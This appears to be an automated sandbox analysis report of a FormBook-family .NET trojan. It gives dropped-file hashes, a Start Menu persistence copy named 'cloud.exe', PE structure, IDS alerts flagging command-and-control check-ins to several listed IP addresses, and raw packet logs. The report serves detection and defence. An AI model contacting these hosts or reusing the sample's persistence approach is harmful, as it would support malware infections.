                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uqly2jga.fdg.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1

                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Adobe\cloud.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):850432
                                                                                              Entropy (8bit):7.655662524298608
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:nScmUe6HXOlC0T8bPQgvS59OTE+PdfivvDsM46F0vEpaFkhVtQzG0QyVvq:nesMmPQgvSuE+VYb7evBknWzGfyVv
                                                                                              MD5:DAFC40B0CA83E739D2733EF7F0CA70F8
                                                                                              SHA1:EDB23AC87BC46D6F67E59E35CABCEDD2B8B8BA65
                                                                                              SHA-256:A1A26AC35276224149AE65AA11A0413E8309E9CDAEB22BDE42893A3559387FB7
                                                                                              SHA-512:C2AE2D3A37679673F28FD194131FDC37A680E96B3A9B5DFD5F9D4F859D8A2D9C497A718AF35966059AEC10A5B6C17E9951A7CFE3F937ECDE0F8BE47566CD40CD
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 35%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P................0..6.........."/... ...`....@.. .......................@............@.....................................O....`..\.................... ....................................................... ............... ..H............text...(5... ...6.................. ..`.rsrc...\....`.......8..............@..@.reloc....... ......................@..B................./......H....... "..............................................................^s....%o....%o....o....*..(....*..(....*..{....*"..}....*....0..........(....(.......(....*..0..H.........+...(....t....o......r...po......o....&..&....X...(....t....o.....i2.*........&+......f..(....t......o....(....*..(....*Z .&.......%.....(....*....0..(........(....t!...o....s.....o.....o.....o....*.0..y.......r)..p...+f.(.....(.....o.....s ........+........i].....a.o!......X......i2...o"...... &#....

                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Adobe\cloud.exe:Zone.Identifier

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:true
                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):7.655662524298608
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                              File name:SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe
                                                                                              File size:850432
                                                                                              MD5:dafc40b0ca83e739d2733ef7f0ca70f8
                                                                                              SHA1:edb23ac87bc46d6f67e59e35cabcedd2b8b8ba65
                                                                                              SHA256:a1a26ac35276224149ae65aa11a0413e8309e9cdaeb22bde42893a3559387fb7
                                                                                              SHA512:c2ae2d3a37679673f28fd194131fdc37a680e96b3a9b5dfd5f9d4f859d8a2d9c497a718af35966059aec10a5b6c17e9951a7cfe3f937ecde0f8be47566cd40cd
                                                                                              SSDEEP:12288:nScmUe6HXOlC0T8bPQgvS59OTE+PdfivvDsM46F0vEpaFkhVtQzG0QyVvq:nesMmPQgvSuE+VYb7evBknWzGfyVv
                                                                                              TLSH:7805AE83F09A386CFDDF027BF5A94E35A6D1564A09421841B0B53FD17F62CC24BD87AA
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P................0..6.........."/... ...`....@.. .......................@............@................................

                                                                                              File Icon

                                                                                              Icon Hash:9492b292e88c96c8

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x402f22
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x97935090 [Tue Aug 2 00:47:12 2050 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              jmp dword ptr [00402000h]
                                                                                              adc eax, 6E74F237h
                                                                                              jno 00007F5034C51994h
                                                                                              jp 00007F5034C51993h
                                                                                              arpl word ptr [edx+edi*2-6Eh], bp
                                                                                              wait
                                                                                              jns 00007F5034C51997h
                                                                                              salc
                                                                                              jno 00007F5034C5199Dh
                                                                                              push 626D5869h
                                                                                              xor al, 6Dh
                                                                                              jno 00007F5034C51994h
                                                                                              jp 00007F5034C51997h
                                                                                              arpl word ptr [edx+edi*2+6Dh], bp
                                                                                              jns 00007F5034C51998h
                                                                                              outsb
                                                                                              jno 00007F5034C5199Dh
                                                                                              push 626D5869h
                                                                                              je 00007F5034C5199Fh
                                                                                              jno 00007F5034C51994h
                                                                                              jp 00007F5034C51997h
                                                                                              arpl word ptr [edx+edi*2+6Dh], bp
                                                                                              jns 00007F5034C51998h
                                                                                              outsb
                                                                                              jno 00007F5034C5191Dh
                                                                                              push 7D635869h
                                                                                              into
                                                                                              arpl word ptr [ecx-2Ah], si
                                                                                              jnc 00007F5034C518DAh
                                                                                              inc edx
                                                                                              aam 7Bh
                                                                                              and dword ptr [ecx+18063158h], ebp
                                                                                              sbb byte ptr [eax+19h], cl
                                                                                              sub al, byte ptr [edx]
                                                                                              add eax, 421C0C06h
                                                                                              sbb dword ptr [44191502h+ecx], eax
                                                                                              sbb eax, dword ptr [eax]
                                                                                              dec esi
                                                                                              add ebx, dword ptr [esi]
                                                                                              push es
                                                                                              dec ecx
                                                                                              xor dword ptr [ebx], eax
                                                                                              inc edx
                                                                                              xor byte ptr [edx], ah
                                                                                              and al, byte ptr [edx+17h]
                                                                                              or al, byte ptr [edi]
                                                                                              or dword ptr [eax+69h], edx
                                                                                              jnc 00007F5034C51973h
                                                                                              outsb
                                                                                              jno 00007F5034C5199Dh
                                                                                              push 326D5869h
                                                                                              xor dword ptr [ebp+71h], ebp
                                                                                              jnp 00007F5034C51999h
                                                                                              arpl word ptr [eax+7907C706h], sp
                                                                                              outsb
                                                                                              jno 00007F5034C5199Dh
                                                                                              push 628D5869h
                                                                                              jp 00007F5034C5197Eh
                                                                                              jp 00007F5034C51995h
                                                                                              dec edx
                                                                                              arpl word ptr [edx+71h], si
                                                                                              insd
                                                                                              jnle 00007F5034C51998h
                                                                                              outsb
                                                                                              jno 00007F5034C5199Dh
                                                                                              push 69503669h
                                                                                              je 00007F5034C5199Fh
                                                                                              push ecx
                                                                                              bound edi, dword ptr [edx+65h]
                                                                                              and esp, dword ptr [edi+7Ah]
                                                                                              insd
                                                                                              cmp dword ptr fs:[ebp+6Eh], esp
                                                                                              push ecx
                                                                                              imul ebp, dword ptr [eax+69h], 5Ah
                                                                                              insd
                                                                                              bound esi, dword ptr [eax+6Dh]

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2ed00x4f.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb60000x1bf5c.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xd20000xc.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x2eb40x1c.text
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x20000xb35280xb3600False0.8508084712543554data7.804027408754121IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0xb60000x1bf5c0x1c000False0.24953787667410715data4.600865154552556IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0xd20000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountry
                                                                                              RT_ICON0xb61a00x3304PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                              RT_ICON0xb94b40x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536
                                                                                              RT_ICON0xc9cec0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384
                                                                                              RT_ICON0xcdf240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216
                                                                                              RT_ICON0xd04dc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096
                                                                                              RT_ICON0xd15940x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024
                                                                                              RT_GROUP_ICON0xd1a0c0x5adata
                                                                                              RT_VERSION0xd1a780x2e4data
                                                                                              RT_MANIFEST0xd1d6c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                                              Imports

                                                                                              DLLImport
                                                                                              mscoree.dll_CorExeMain

                                                                                              Network Behavior

                                                                                              Snort IDS Alerts

                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                              192.168.2.4194.58.112.17449697802031449 12/27/22-10:54:20.411515TCP2031449ET TROJAN FormBook CnC Checkin (GET)4969780192.168.2.4194.58.112.174
                                                                                              192.168.2.4162.254.33.21449701802031412 12/27/22-10:54:37.541792TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970180192.168.2.4162.254.33.214
                                                                                              192.168.2.464.225.91.7349703802031449 12/27/22-10:54:45.923196TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970380192.168.2.464.225.91.73
                                                                                              192.168.2.4162.254.33.21449701802031453 12/27/22-10:54:37.541792TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970180192.168.2.4162.254.33.214
                                                                                              192.168.2.4107.149.40.24749705802031449 12/27/22-10:54:54.148136TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970580192.168.2.4107.149.40.247
                                                                                              192.168.2.4146.148.102.20149709802031453 12/27/22-10:55:10.096352TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970980192.168.2.4146.148.102.201
                                                                                              192.168.2.4141.8.195.12449721802031449 12/27/22-10:56:01.215430TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.4141.8.195.124
                                                                                              192.168.2.4194.58.112.17449697802031453 12/27/22-10:54:20.411515TCP2031453ET TROJAN FormBook CnC Checkin (GET)4969780192.168.2.4194.58.112.174
                                                                                              192.168.2.4107.149.40.24749705802031412 12/27/22-10:54:54.148136TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970580192.168.2.4107.149.40.247
                                                                                              192.168.2.488.99.217.19749725802031453 12/27/22-10:56:20.099252TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.488.99.217.197
                                                                                              192.168.2.4194.58.112.17449697802031412 12/27/22-10:54:20.411515TCP2031412ET TROJAN FormBook CnC Checkin (GET)4969780192.168.2.4194.58.112.174
                                                                                              192.168.2.4141.8.195.12449721802031412 12/27/22-10:56:01.215430TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.4141.8.195.124
                                                                                              192.168.2.488.99.217.19749725802031412 12/27/22-10:56:20.099252TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.488.99.217.197
                                                                                              192.168.2.4107.149.40.24749705802031453 12/27/22-10:54:54.148136TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970580192.168.2.4107.149.40.247
                                                                                              192.168.2.4141.8.195.12449721802031453 12/27/22-10:56:01.215430TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.4141.8.195.124
                                                                                              192.168.2.488.99.217.19749725802031449 12/27/22-10:56:20.099252TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.488.99.217.197
                                                                                              192.168.2.464.225.91.7349703802031453 12/27/22-10:54:45.923196TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970380192.168.2.464.225.91.73
                                                                                              192.168.2.4146.148.102.20149709802031412 12/27/22-10:55:10.096352TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970980192.168.2.4146.148.102.201
                                                                                              192.168.2.4194.58.112.17449728802031412 12/27/22-10:56:34.904156TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972880192.168.2.4194.58.112.174
                                                                                              192.168.2.4194.58.112.17449728802031453 12/27/22-10:56:34.904156TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972880192.168.2.4194.58.112.174
                                                                                              192.168.2.4162.254.33.21449701802031449 12/27/22-10:54:37.541792TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970180192.168.2.4162.254.33.214
                                                                                              192.168.2.4146.148.102.20149709802031449 12/27/22-10:55:10.096352TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970980192.168.2.4146.148.102.201
                                                                                              192.168.2.464.225.91.7349703802031412 12/27/22-10:54:45.923196TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970380192.168.2.464.225.91.73
                                                                                              192.168.2.4194.58.112.17449728802031449 12/27/22-10:56:34.904156TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972880192.168.2.4194.58.112.174

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 27, 2022 10:52:25.135488033 CET49672443192.168.2.4104.212.67.92
                                                                                              Dec 27, 2022 10:52:25.913398027 CET49690443192.168.2.4204.79.197.200
                                                                                              Dec 27, 2022 10:52:25.913544893 CET49690443192.168.2.4204.79.197.200
                                                                                              Dec 27, 2022 10:52:25.913656950 CET49690443192.168.2.4204.79.197.200
                                                                                              Dec 27, 2022 10:52:25.913703918 CET49690443192.168.2.4204.79.197.200
                                                                                              Dec 27, 2022 10:52:25.913779974 CET49690443192.168.2.4204.79.197.200
                                                                                              Dec 27, 2022 10:52:25.913803101 CET49690443192.168.2.4204.79.197.200
                                                                                              Dec 27, 2022 10:52:25.913888931 CET49690443192.168.2.4204.79.197.200
                                                                                              Dec 27, 2022 10:52:25.913939953 CET49690443192.168.2.4204.79.197.200
                                                                                              Dec 27, 2022 10:52:25.913970947 CET49690443192.168.2.4204.79.197.200
                                                                                              Dec 27, 2022 10:52:25.930795908 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.930839062 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.930963039 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.930980921 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.930996895 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931010962 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931026936 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931042910 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931061029 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931070089 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931086063 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931101084 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931116104 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931130886 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931144953 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931159973 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931175947 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931191921 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931207895 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931222916 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931237936 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931246996 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931262016 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931277990 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931293964 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931308985 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931324959 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931340933 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931355953 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931416988 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931433916 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931516886 CET49690443192.168.2.4204.79.197.200
                                                                                              Dec 27, 2022 10:52:25.931540966 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931560993 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931577921 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931593895 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931608915 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931622982 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931695938 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931711912 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931749105 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931766033 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931782961 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931798935 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931813955 CET49690443192.168.2.4204.79.197.200
                                                                                              Dec 27, 2022 10:52:25.931816101 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931855917 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931871891 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931888103 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931934118 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.931950092 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.932013988 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.932030916 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.932065964 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.932080984 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.984180927 CET44349690204.79.197.200192.168.2.4
                                                                                              Dec 27, 2022 10:52:25.985070944 CET49690443192.168.2.4204.79.197.200
                                                                                              Dec 27, 2022 10:53:12.475089073 CET4968680192.168.2.493.184.220.29
                                                                                              Dec 27, 2022 10:53:16.905814886 CET4969280192.168.2.493.184.221.240
                                                                                              Dec 27, 2022 10:53:16.906017065 CET4969380192.168.2.413.107.4.50
                                                                                              Dec 27, 2022 10:53:16.906234026 CET4969480192.168.2.413.107.4.50
                                                                                              Dec 27, 2022 10:53:16.923299074 CET804969313.107.4.50192.168.2.4
                                                                                              Dec 27, 2022 10:53:16.923331022 CET804969313.107.4.50192.168.2.4
                                                                                              Dec 27, 2022 10:53:16.923347950 CET804969413.107.4.50192.168.2.4
                                                                                              Dec 27, 2022 10:53:16.923365116 CET804969413.107.4.50192.168.2.4
                                                                                              Dec 27, 2022 10:53:16.923465967 CET4969380192.168.2.413.107.4.50
                                                                                              Dec 27, 2022 10:53:16.923504114 CET4969480192.168.2.413.107.4.50
                                                                                              Dec 27, 2022 10:53:16.924971104 CET804969293.184.221.240192.168.2.4
                                                                                              Dec 27, 2022 10:53:16.925177097 CET4969280192.168.2.493.184.221.240
                                                                                              Dec 27, 2022 10:53:22.421977997 CET804969113.107.4.50192.168.2.4
                                                                                              Dec 27, 2022 10:54:06.489545107 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:06.756997108 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:06.757160902 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:06.757294893 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.025693893 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.031235933 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.031274080 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.031286955 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.031306028 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.031339884 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.031358957 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.031379938 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.031399965 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.031420946 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.031443119 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.031471014 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.031534910 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.302020073 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.302196026 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.302289963 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.302371025 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.302376986 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.302434921 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.302447081 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.302525997 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.302591085 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.302607059 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.302686930 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.302776098 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.302838087 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.302954912 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.303015947 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.303033113 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.303096056 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.303179979 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.303221941 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.303225040 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.303273916 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.303323984 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.303325891 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.303374052 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.303396940 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.303421974 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.303469896 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.303473949 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.303519964 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.303572893 CET4969580192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:54:07.570673943 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.570749044 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.570770979 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.570796967 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.570822001 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.570848942 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.570872068 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.570895910 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.570919991 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.570946932 CET804969535.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:54:07.570969105 CET804969535.213.254.232192.168.2.4
